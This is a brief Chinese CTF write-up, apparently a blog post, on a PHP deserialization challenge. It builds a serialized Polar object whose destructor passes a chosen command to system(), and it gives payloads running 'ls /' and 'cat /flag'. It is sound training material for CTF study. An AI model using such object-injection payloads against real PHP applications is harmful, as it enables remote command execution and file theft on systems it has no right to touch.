1、
2、反序列化
<?phpclass Polar{public $url = 'polarctf.com';public $lt='system';public $b='ls /';function __destruct(){$a = $this->lt;$a($this->b);}
}$a = new Polar();
echo serialize($a);
?>###O:5:"Polar":3:{s:3:"url";s:12:"polarctf.com";s:2:"lt";s:6:"system";s:1:"b";s:4:"ls /";}
<?phpclass Polar{public $url = 'polarctf.com';public $lt='system';public $b='cat /flag';function __destruct(){$a = $this->lt;$a($this->b);}
}$a = new Polar();
echo serialize($a);
?>##O:5:"Polar":3:{s:3:"url";s:12:"polarctf.com";s:2:"lt";s:6:"system";s:1:"b";s:9:"cat /flag";}
得到答案
![[产品管理-32]:NPDP新产品开发 - 30 - 文化、团队与领导力 - 领导力与团队的可持续发展](https://i-blog.csdnimg.cn/direct/367bd116d6c743f1b85e1dd702d542e2.png)
![[Python数据拟合与可视化]:使用线性、多项式、指数和高斯模型拟合数据](https://i-blog.csdnimg.cn/direct/b2ea4104e8204092b08df2e6178809fb.jpeg)
